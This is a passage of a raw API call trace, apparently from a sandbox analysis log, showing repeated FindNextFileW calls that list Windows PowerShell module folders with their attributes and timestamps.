ftLastWriteTime.dwHighDateTime=0x1d5ace4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0263.071] FindNextFileW (in: hFindFile=0x1acc7510, lpFindFileData=0x1b83e420 | out: lpFindFileData=0x1b83e420*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc89b8c5c, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x1fc2682, ftLastAccessTime.dwHighDateTime=0x1d942b2, ftLastWriteTime.dwLowDateTime=0xcbd6d157, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppBackgroundTask", cAlternateFileName="")) returned 1 [0263.071] FindNextFileW (in: hFindFile=0x1acc7510, lpFindFileData=0x1b83e420 | out: lpFindFileData=0x1b83e420*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x6d90540, ftCreationTime.dwHighDateTime=0x1d5ace4, ftLastAccessTime.dwLowDateTime=0x1fc2682, ftLastAccessTime.dwHighDateTime=0x1d942b2, ftLastWriteTime.dwLowDateTime=0x744502b, ftLastWriteTime.dwHighDateTime=0x1d5ace4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppLocker", cAlternateFileName="APPLOC~1")) returned 1 [0263.071] FindNextFileW (in: hFindFile=0x1acc7510, lpFindFileData=0x1b83e420 | out: lpFindFileData=0x1b83e420*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x6d90540, ftCreationTime.dwHighDateTime=0x1d5ace4, ftLastAccessTime.dwLowDateTime=0x1fc2682, ftLastAccessTime.dwHighDateTime=0x1d942b2, ftLastWriteTime.dwLowDateTime=0x744502b, ftLastWriteTime.dwHighDateTime=0x1d5ace4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppvClient", cAlternateFileName="APPVCL~1")) returned 1 [0263.072] FindNextFileW (in: hFindFile=0x1acc7510, lpFindFileData=0x1b83e420 | out: lpFindFileData=0x1b83e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89b8c5c, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x1fc2682, ftLastAccessTime.dwHighDateTime=0x1d942b2, ftLastWriteTime.dwLowDateTime=0xa16872ee, ftLastWriteTime.dwHighDateTime=0x1d5ace3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Appx", cAlternateFileName="")) returned 1 [0263.072] FindNextFileW (in: hFindFile=0x1acc7510, lpFindFileData=0x1b83e420 | out: lpFindFileData=0x1b83e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6d90540, ftCreationTime.dwHighDateTime=0x1d5ace4, ftLastAccessTime.dwLowDateTime=0x1fc2682, ftLastAccessTime.dwHighDateTime=0x1d942b2, ftLastWriteTime.dwLowDateTime=0x744502b, ftLastWriteTime.dwHighDateTime=0x1d5ace4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AssignedAccess", cAlternateFileName="ASSIGN~1")) returned 1 [0263.072] FindNextFileW (in: hFindFile=0x1acc7510, lpFindFileData=0x1b83e420 | out: lpFindFileData=0x1b83e420*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x6d90540, ftCreationTime.dwHighDateTime=0x1d5ace4, ftLastAccessTime.dwLowDateTime=0x1fc2682, ftLastAccessTime.dwHighDateTime=0x1d942b2, ftLastWriteTime.dwLowDateTime=0x744502b, ftLastWriteTime.dwHighDateTime=0x1d5ace4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BitLocker", cAlternateFileName="BITLOC~1")) returned 1 [0263.072] FindNextFileW (in: hFindFile=0x1acc7510, lpFindFileData=0x1b83e420 | out: lpFindFileData=0x1b83e420*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc89b8c5c, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x1fc2682, ftLastAccessTime.dwHighDateTime=0x1d942b2, ftLastWriteTime.dwLowDateTime=0xcbd6d157, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BitsTransfer", cAlternateFileName="")) returned 1 [0263.072] FindNextFileW (in: hFindFile=0x1acc7510, lpFindFileData=0x1b83e420 | out: lpFindFileData=0x1b83e420*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x6d90540, ftCreationTime.dwHighDateTime=0x1d5ace4, ftLastAccessTime.dwLowDateTime=0x1fc2682, ftLastAccessTime.dwHighDateTime=0x1d942b2, ftLastWriteTime.dwLowDateTime=0x744502b, ftLastWriteTime.dwHighDateTime=0x1d5ace4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BranchCache", cAlternateFileName="BRANCH~1")) returned 1 [0263.072] FindNextFileW (in: hFindFile=0x1acc7510, lpFindFileData=0x1b83e420 | out: lpFindFileData=0x1b83e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89b8c5c, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x1fc2682, ftLastAccessTime.dwHighDateTime=0x1d942b2, ftLastWriteTime.dwLowDateTime=0xcbd930d4, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CimCmdlets", cAlternateFileName="")) returned 1 [0263.072] FindNextFileW (in: hFindFile=0x1acc7510, lpFindFileData=0x1b83e420 | out: lpFindFileData=0x1b83e420*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x6d90540, ftCreationTime.dwHighDateTime=0x1d5ace4, ftLastAccessTime.dwLowDateTime=0x1fc2682, ftLastAccessTime.dwHighDateTime=0x1d942b2, ftLastWriteTime.dwLowDateTime=0x744502b, ftLastWriteTime.dwHighDateTime=0x1d5ace4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ConfigCI", cAlternateFileName="")) returned 1 [0263.072] FindNextFileW (in: hFindFile=0x1acc7510, lpFindFileData=0x1b83e420 | out: lpFindFileData=0x1b83e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89b8c5c, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x1fc2682, ftLastAccessTime.dwHighDateTime=0x1d942b2, ftLastWriteTime.dwLowDateTime=0xbe00174, ftLastWriteTime.dwHighDateTime=0x1d5ace1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Defender", cAlternateFileName="")) returned 1 [0263.072] FindNextFileW (in: hFindFile=0x1acc7510, lpFindFileData=0x1b83e420 | out: lpFindFileData=0x1b83e420*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc89b8c5c, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x1fc2682, ftLastAccessTime.dwHighDateTime=0x1d942b2, ftLastWriteTime.dwLowDateTime=0xcbd930d4, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DeliveryOptimization", cAlternateFileName="")) returned 1 [0263.072] FindNextFileW (in: hFindFile=0x1acc7510, lpFindFileData=0x1b83e420 | out: lpFindFileData=0x1b83e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89b8c5c, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x1fc2682, ftLastAccessTime.dwHighDateTime=0x1d942b2, ftLastWriteTime.dwLowDateTime=0xcbd930d4, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DirectAccessClientComponents", cAlternateFileName="")) returned 1 [0263.072] FindNextFileW (in: hFindFile=0x1acc7510, lpFindFileData=0x1b83e420 | out: lpFindFileData=0x1b83e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89b8c5c, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x1fc2682, ftLastAccessTime.dwHighDateTime=0x1d942b2, ftLastWriteTime.dwLowDateTime=0xa16872ee, ftLastWriteTime.dwHighDateTime=0x1d5ace3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Dism", cAlternateFileName="")) returned 1 [0263.072] FindNextFileW (in: hFindFile=0x1acc7510, lpFindFileData=0x1b83e420 | out: lpFindFileData=0x1b83e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89b8c5c, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x1fc2682, ftLastAccessTime.dwHighDateTime=0x1d942b2, ftLastWriteTime.dwLowDateTime=0xcbdbb8b3, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DnsClient", cAlternateFileName="")) returned 1 [0263.072] FindNextFileW (in: hFindFile=0x1acc7510, lpFindFileData=0x1b83e420 | out: lpFindFileData=0x1b83e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89b8c5c, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x1fc2682, ftLastAccessTime.dwHighDateTime=0x1d942b2, ftLastWriteTime.dwLowDateTime=0xcbdbb8b3, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="EventTracingManagement", cAlternateFileName="")) returned 1 [0263.073] FindNextFileW (in: hFindFile=0x1acc7510, lpFindFileData=0x1b83e420 | out: lpFindFileData=0x1b83e420*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc89b8c5c, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x1fc2682, ftLastAccessTime.dwHighDateTime=0x1d942b2, ftLastWriteTime.dwLowDateTime=0xcbdbb8b3, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="International", cAlternateFileName="")) returned 1 [0263.073] FindNextFileW (in: hFindFile=0x1acc7510, lpFindFileData=0x1b83e420 | out: lpFindFileData=0x1b83e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89b8c5c, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x1fc2682, ftLastAccessTime.dwHighDateTime=0x1d942b2, ftLastWriteTime.dwLowDateTime=0xcbdbb8b3, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="iSCSI", cAlternateFileName="")) returned 1 [0263.073] FindNextFileW (in: hFindFile=0x1acc7510, lpFindFileData=0x1b83e420 | out: lpFindFileData=0x1b83e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf00bc16c, ftCreationTime.dwHighDateTime=0x1d5ace3, ftLastAccessTime.dwLowDateTime=0x1fc2682, ftLastAccessTime.dwHighDateTime=0x1d942b2, ftLastWriteTime.dwLowDateTime=0xf00bc16c, ftLastWriteTime.dwHighDateTime=0x1d5ace3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ISE", cAlternateFileName="")) returned 1 [0263.073] FindNextFileW (in: hFindFile=0x1acc7510, lpFindFileData=0x1b83e420 | out: lpFindFileData=0x1b83e420*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc89b8c5c, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x1fc2682, ftLastAccessTime.dwHighDateTime=0x1d942b2, ftLastWriteTime.dwLowDateTime=0xa16872ee, ftLastWriteTime.dwHighDateTime=0x1d5ace3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Kds", cAlternateFileName="")) returned 1 [0263.073] FindNextFileW (in: hFindFile=0x1acc7510, lpFindFileData=0x1b83e420 | out: lpFindFileData=0x1b83e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89b8c5c, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x1fc2682, ftLastAccessTime.dwHighDateTime=0x1d942b2, ftLastWriteTime.dwLowDateTime=0xa16872ee, ftLastWriteTime.dwHighDateTime=0x1d5ace3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Archive", cAlternateFileName="")) returned 1 [0263.073] FindNextFileW (in: hFindFile=0x1acc7510, lpFindFileData=0x1b83e420 | out: lpFindFileData=0x1b83e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89b8c5c, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x1fc2682, ftLastAccessTime.dwHighDateTime=0x1d942b2, ftLastWriteTime.dwLowDateTime=0xcbddf8a3, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Diagnostics", cAlternateFileName="")) returned 1 [0263.073] FindNextFileW (in: hFindFile=0x1acc7510, lpFindFileData=0x1b83e420 | out: lpFindFileData=0x1b83e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89b8c5c, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x1fc2682, ftLastAccessTime.dwHighDateTime=0x1d942b2, ftLastWriteTime.dwLowDateTime=0xcbddf8a3, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Host", cAlternateFileName="")) returned 1 [0263.073] FindNextFileW (in: hFindFile=0x1acc7510, lpFindFileData=0x1b83e420 | out: lpFindFileData=0x1b83e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89b8c5c, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x1fc2682, ftLastAccessTime.dwHighDateTime=0x1d942b2, ftLastWriteTime.dwLowDateTime=0xbe25506, ftLastWriteTime.dwHighDateTime=0x1d5ace1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.LocalAccounts", cAlternateFileName="")) returned 1 [0263.073] FindNextFileW (in: hFindFile=0x1acc7510, lpFindFileData=0x1b83e420 | out: lpFindFileData=0x1b83e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89b8c5c, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xa7ca8e4b, ftLastAccessTime.dwHighDateTime=0x1d9a995, ftLastWriteTime.dwLowDateTime=0xcbddf8a3, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Management", cAlternateFileName="")) returned 1 [0263.073] FindNextFileW (in: hFindFile=0x1acc7510, lpFindFileData=0x1b83e420 | out: lpFindFileData=0x1b83e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89b8c5c, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x1fc2682, ftLastAccessTime.dwHighDateTime=0x1d942b2, ftLastWriteTime.dwLowDateTime=0xa16872ee, ftLastWriteTime.dwHighDateTime=0x1d5ace3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.ODataUtils", cAlternateFileName="")) returned 1 [0263.074] FindNextFileW (in: hFindFile=0x1acc7510, lpFindFileData=0x1b83e420 | out: lpFindFileData=0x1b83e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89b8c5c, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x1fc2682, ftLastAccessTime.dwHighDateTime=0x1d942b2, ftLastWriteTime.dwLowDateTime=0xcbddf8a3, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Security", cAlternateFileName="")) returned 1 [0263.074] FindNextFileW (in: hFindFile=0x1acc7510, lpFindFileData=0x1b83e420 | out: lpFindFileData=0x1b83e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89b8c5c, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xa7ca8e4b, ftLastAccessTime.dwHighDateTime=0x1d9a995, ftLastWriteTime.dwLowDateTime=0xcbddf8a3, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Utility", cAlternateFileName="")) returned 1 [0263.074] FindNextFileW (in: hFindFile=0x1acc7510, lpFindFileData=0x1b83e420 | out: lpFindFileData=0x1b83e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89b8c5c, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xf898270e, ftLastAccessTime.dwHighDateTime=0x1d94211, ftLastWriteTime.dwLowDateTime=0xcbddf8a3, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.WSMan.Management", cAlternateFileName="")) returned 1 [0263.074] FindNextFileW (in: hFindFile=0x1acc7510, lpFindFileData=0x1b83e420 | out: lpFindFileData=0x1b83e420*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc89b8c5c, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xf898270e, ftLastAccessTime.dwHighDateTime=0x1d94211, ftLastWriteTime.dwLowDateTime=0xcbddf8a3, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MMAgent", cAlternateFileName="")) returned 1 [0263.074] FindNextFileW (in: hFindFile=0x1acc7510, lpFindFileData=0x1b83e420 | out: lpFindFileData=0x1b83e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89b8c5c, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xf898270e, ftLastAccessTime.dwHighDateTime=0x1d94211, ftLastWriteTime.dwLowDateTime=0xa16872ee, ftLastWriteTime.dwHighDateTime=0x1d5ace3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MsDtc", cAlternateFileName="")) returned 1 [0263.074] FindNextFileW (in: hFindFile=0x1acc7510, lpFindFileData=0x1b83e420 | out: lpFindFileData=0x1b83e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89b8c5c, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xf8a8d76f, ftLastAccessTime.dwHighDateTime=0x1d94211, ftLastWriteTime.dwLowDateTime=0xcbe2e454, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetAdapter", cAlternateFileName="")) returned 1 [0263.074] FindNextFileW (in: hFindFile=0x1acc7510, lpFindFileData=0x1b83e420 | out: lpFindFileData=0x1b83e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89b8c5c, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xf8a8d76f, ftLastAccessTime.dwHighDateTime=0x1d94211, ftLastWriteTime.dwLowDateTime=0xcbe2e454, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetConnection", cAlternateFileName="")) returned 1 [0263.074] FindNextFileW (in: hFindFile=0x1acc7510, lpFindFileData=0x1b83e420 | out: lpFindFileData=0x1b83e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89b8c5c, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xf8ad9c23, ftLastAccessTime.dwHighDateTime=0x1d94211, ftLastWriteTime.dwLowDateTime=0xcbe51fae, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetEventPacketCapture", cAlternateFileName="")) returned 1 [0263.074] FindNextFileW (in: hFindFile=0x1acc7510, lpFindFileData=0x1b83e420 | out: lpFindFileData=0x1b83e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89b8c5c, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xf8ad9c23, ftLastAccessTime.dwHighDateTime=0x1d94211, ftLastWriteTime.dwLowDateTime=0xcbe51fae, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetLbfo", cAlternateFileName="")) returned 1 [0263.074] FindNextFileW (in: hFindFile=0x1acc7510, lpFindFileData=0x1b83e420 | out: lpFindFileData=0x1b83e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89b8c5c, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xf8ad9c23, ftLastAccessTime.dwHighDateTime=0x1d94211, ftLastWriteTime.dwLowDateTime=0xcbe51fae, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetNat", cAlternateFileName="")) returned 1 [0263.074] FindNextFileW (in: hFindFile=0x1acc7510, lpFindFileData=0x1b83e420 | out: lpFindFileData=0x1b83e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89b8c5c, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xf8b4c2ac, ftLastAccessTime.dwHighDateTime=0x1d94211, ftLastWriteTime.dwLowDateTime=0xcbe51fae, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetQos", cAlternateFileName="")) returned 1 [0263.074] FindNextFileW (in: hFindFile=0x1acc7510, lpFindFileData=0x1b83e420 | out: lpFindFileData=0x1b83e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89b8c5c, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xf8b72610, ftLastAccessTime.dwHighDateTime=0x1d94211, ftLastWriteTime.dwLowDateTime=0xa16872ee, ftLastWriteTime.dwHighDateTime=0x1d5ace3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetSecurity", cAlternateFileName="")) returned 1 [0263.075] FindNextFileW (in: hFindFile=0x1acc7510, lpFindFileData=0x1b83e420 | out: lpFindFileData=0x1b83e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89ddd70, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xf8b72610, ftLastAccessTime.dwHighDateTime=0x1d94211, ftLastWriteTime.dwLowDateTime=0xcbe77f21, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetSwitchTeam", cAlternateFileName="")) returned 1 [0263.075] FindNextFileW (in: hFindFile=0x1acc7510, lpFindFileData=0x1b83e420 | out: lpFindFileData=0x1b83e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89ddd70, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xf8b9877d, ftLastAccessTime.dwHighDateTime=0x1d94211, ftLastWriteTime.dwLowDateTime=0xcbe9f62b, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetTCPIP", cAlternateFileName="")) returned 1 [0263.075] FindNextFileW (in: hFindFile=0x1acc7510, lpFindFileData=0x1b83e420 | out: lpFindFileData=0x1b83e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89ddd70, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xf8b9877d, ftLastAccessTime.dwHighDateTime=0x1d94211, ftLastWriteTime.dwLowDateTime=0xcbe9f62b, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetworkConnectivityStatus", cAlternateFileName="")) returned 1 [0263.075] FindNextFileW (in: hFindFile=0x1acc7510, lpFindFileData=0x1b83e420 | out: lpFindFileData=0x1b83e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89ddd70, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xf8b9877d, ftLastAccessTime.dwHighDateTime=0x1d94211, ftLastWriteTime.dwLowDateTime=0xa16872ee, ftLastWriteTime.dwHighDateTime=0x1d5ace3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetworkSwitchManager", cAlternateFileName="")) returned 1 [0263.075] FindNextFileW (in: hFindFile=0x1acc7510, lpFindFileData=0x1b83e420 | out: lpFindFileData=0x1b83e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89ddd70, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xf8bbe908, ftLastAccessTime.dwHighDateTime=0x1d94211, ftLastWriteTime.dwLowDateTime=0xcbfcfdb9, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetworkTransition", cAlternateFileName="")) returned 1 [0263.075] FindNextFileW (in: hFindFile=0x1acc7510, lpFindFileData=0x1b83e420 | out: lpFindFileData=0x1b83e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89ddd70, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xf8bbe908, ftLastAccessTime.dwHighDateTime=0x1d94211, ftLastWriteTime.dwLowDateTime=0xcbfcfdb9, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PcsvDevice", cAlternateFileName="")) returned 1 [0263.075] FindNextFileW (in: hFindFile=0x1acc7510, lpFindFileData=0x1b83e420 | out: lpFindFileData=0x1b83e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89ddd70, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xf8bbe908, ftLastAccessTime.dwHighDateTime=0x1d94211, ftLastWriteTime.dwLowDateTime=0xa16872ee, ftLastWriteTime.dwHighDateTime=0x1d5ace3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PersistentMemory", cAlternateFileName="")) returned 1 [0263.075] FindNextFileW (in: hFindFile=0x1acc7510, lpFindFileData=0x1b83e420 | out: lpFindFileData=0x1b83e420*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc89ddd70, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xf8bbe908, ftLastAccessTime.dwHighDateTime=0x1d94211, ftLastWriteTime.dwLowDateTime=0xa16872ee, ftLastWriteTime.dwHighDateTime=0x1d5ace3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PKI", cAlternateFileName="")) returned 1 [0263.075] FindNextFileW (in: hFindFile=0x1acc7510, lpFindFileData=0x1b83e420 | out: lpFindFileData=0x1b83e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89ddd70, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xf8bbe908, ftLastAccessTime.dwHighDateTime=0x1d94211, 